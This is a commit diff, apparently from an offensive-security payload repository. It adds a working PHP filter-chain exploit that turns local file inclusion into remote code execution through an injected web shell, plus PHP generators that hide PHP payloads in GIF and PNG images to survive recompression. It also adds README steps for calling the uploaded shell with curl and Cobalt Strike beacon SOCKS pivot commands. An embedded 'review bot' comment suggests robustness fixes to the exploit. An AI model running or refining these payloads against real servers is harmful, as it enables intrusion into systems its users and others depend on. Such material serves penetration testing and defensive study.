LFI2RCE - Picture Compression - SOCKS5 CS
|
@ -0,0 +1,60 @@
|
|||
import requests
|
||||
|
||||
url = "http://localhost:8000/chall.php"
|
||||
file_to_use = "/etc/passwd"
|
||||
command = "id"
|
||||
|
||||
#<?=`$_GET[0]`;;?>
|
||||
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
|
||||
|
||||
conversions = {
|
||||
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
|
||||
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
|
||||
'C': 'convert.iconv.UTF8.CSISO2022KR',
|
||||
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
|
||||
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
|
||||
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
|
||||
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
|
||||
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
|
||||
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
|
||||
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
|
||||
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
|
||||
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
|
||||
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
|
||||
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
|
||||
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
|
||||
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
|
||||
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
|
||||
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
|
||||
}
|
||||
|
||||
|
||||
# generate some garbage base64
|
||||
filters = "convert.iconv.UTF8.CSISO2022KR|"
|
||||
filters += "convert.base64-encode|"
|
||||
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
|
||||
filters += "convert.iconv.UTF8.UTF7|"
|
||||
|
||||
|
||||
for c in base64_payload[::-1]:
|
||||
filters += conversions[c] + "|"
|
||||
# decode and reencode to get rid of everything that isn't valid base64
|
||||
filters += "convert.base64-decode|"
|
||||
filters += "convert.base64-encode|"
|
||||
# get rid of equal signs
|
||||
filters += "convert.iconv.UTF8.UTF7|"
|
||||
|
||||
filters += "convert.base64-decode"
|
||||
|
||||
final_payload = f"php://filter/{filters}/resource={file_to_use}"
|
||||
|
||||
with open('payload', 'w') as f:
|
||||
f.write(final_payload)
|
||||
|
||||
r = requests.get(url, params={
|
||||
"0": command,
|
||||
"action": "include",
|
||||
"file": final_payload
|
||||
})
|
||||
|
||||
print(r.text)
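Review bot: `conversions[c]` on the line `filters += conversions[c] + "|"` raises a bare KeyError for any base64 character the table does not map, and the table only covers the characters that occur in the hard-coded `base64_payload`; a comment above the dict such as `# maps only the base64 characters that occur in base64_payload above` would make that dependency explicit. `requests.get(url, params={...})` is called without a `timeout`, so an unresponsive target hangs the script indefinitely; `requests.get(url, params={...}, timeout=10)` is the usual form. The `payload` file is written with a fixed relative name and silently overwritten on each run; moving the name into a variable next to `url` and `file_to_use` would match the other configuration lines at the top.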
|
|
@ -337,6 +337,11 @@ Opsec safe Pass-the-Hash:
|
|||
```powershell
|
||||
# Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.
|
||||
beacon > socks [PORT]
|
||||
beacon > socks [port]
|
||||
beacon > socks [port] [socks4]
|
||||
beacon > socks [port] [socks5]
|
||||
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password]
|
||||
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging]
|
||||
|
||||
# Proxy browser traffic through a specified Internet Explorer process.
|
||||
beacon > browserpivot [pid] [x86|x64]
|
||||
|
|
|
@ -1,7 +1,6 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
"""
|
||||
|
||||
Bulletproof Jpegs Generator
|
||||
Copyright (C) 2012 Damien "virtualabs" Cauquil
|
||||
|
||||
|
@ -18,7 +17,11 @@
|
|||
You should have received a copy of the GNU General Public License along
|
||||
with this program; if not, write to the Free Software Foundation, Inc.,
|
||||
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||
|
||||
|
||||
-------------
|
||||
# How to use
|
||||
b.php?c=ls
|
||||
Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
|
||||
"""
|
||||
from __future__ import print_function
|
||||
|
|
@ -0,0 +1,22 @@
|
|||
<?php
|
||||
// createGIFwithGlobalColorTable.php
|
||||
$_file="example.gif";
|
||||
$_payload="<?php evil();?>";
|
||||
$_width=200;
|
||||
$_height=200;
|
||||
if(strlen($_payload)%3!=0){
|
||||
echo "payload%3==0 !"; exit();
|
||||
}
|
||||
$im = imagecreate($_width, $_height);
|
||||
$_hex=unpack('H*',$_payload);
|
||||
|
||||
$colors_hex=str_split($_hex[1], 6);
|
||||
|
||||
for($i=0; $i < count($colors_hex); $i++){
|
||||
$_color_chunks=str_split($colors_hex[$i], 2);
|
||||
$color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
|
||||
imagesetpixel($im,$i,1,$color);
|
||||
}
|
||||
|
||||
imagegif($im,$_file);
|
||||
?>
|
|
@ -0,0 +1,28 @@
|
|||
<?php
|
||||
//createPNGwithPLTE.php
|
||||
// bypass imageCreateFromPng and imagepng
|
||||
$_payload="<?php phpinfo()?> ";
|
||||
$_pay_len=strlen($_payload);
|
||||
if(strlen($_payload)%3!=0){
|
||||
echo "payload%3==0 !"; exit();
|
||||
}
|
||||
|
||||
|
||||
$width=$_pay_len/3;
|
||||
$height=20;
|
||||
//$im = imageCreateFromPng("existing.png");
|
||||
$im = imagecreate($width, $height);
|
||||
|
||||
$_hex=unpack('H*',$_payload);
|
||||
$_chunks=str_split($_hex[1], 6);
|
||||
|
||||
for($i=0; $i < count($_chunks); $i++){
|
||||
|
||||
$_color_chunks=str_split($_chunks[$i], 2);
|
||||
$color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
|
||||
|
||||
imagesetpixel($im,$i,1,$color);
|
||||
|
||||
}
|
||||
|
||||
imagepng($im,"example.png");
|
|
@ -1,5 +0,0 @@
|
|||
# How to use
|
||||
b.php?c=ls
|
||||
|
||||
|
||||
Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
|
|
@ -9,7 +9,7 @@
|
|||
* [Defaults extensions](#defaults-extensions)
|
||||
* [Upload tricks](#upload-tricks)
|
||||
* [Filename vulnerabilities](#filename-vulnerabilities)
|
||||
* [Picture upload with LFI](#picture-upload-with-lfi)
|
||||
* [Picture compression](#picture-compression-)
|
||||
* [Configuration Files](#configuration-files)
|
||||
* [CVE - Image Tragik](#cve---image-tragik)
|
||||
* [CVE - FFMpeg](#cve---ffmpeg)
|
||||
|
@ -107,12 +107,16 @@ Also you upload:
|
|||
- HTML/SVG files to trigger an XSS
|
||||
- EICAR file to check the presence of an antivirus
|
||||
|
||||
### Picture upload with LFI
|
||||
### Picture Compression
|
||||
|
||||
Valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
|
||||
Create valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
|
||||
|
||||
- Picture Metadata, hide the payload inside a comment tag in the metadata.
|
||||
- Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`.
|
||||
- [JPG](https://virtualabs.fr/Nasty-bulletproof-Jpegs-l): use createBulletproofJPG.py
|
||||
- [PNG](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createPNGwithPLTE.php
|
||||
- [GIF](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createGIFwithGlobalColorTable.php
|
||||
|
||||
|
||||
### Picture with custom metadata
|
||||
|
||||
|
@ -198,4 +202,5 @@ Upload the XML file to `$JETTY_BASE/webapps/`
|
|||
* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
|
||||
* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
|
||||
* [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
|
||||
* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
|
||||
* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
|
||||
* [Injection points in popular image formats - Daniel Kalinowski - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/)
|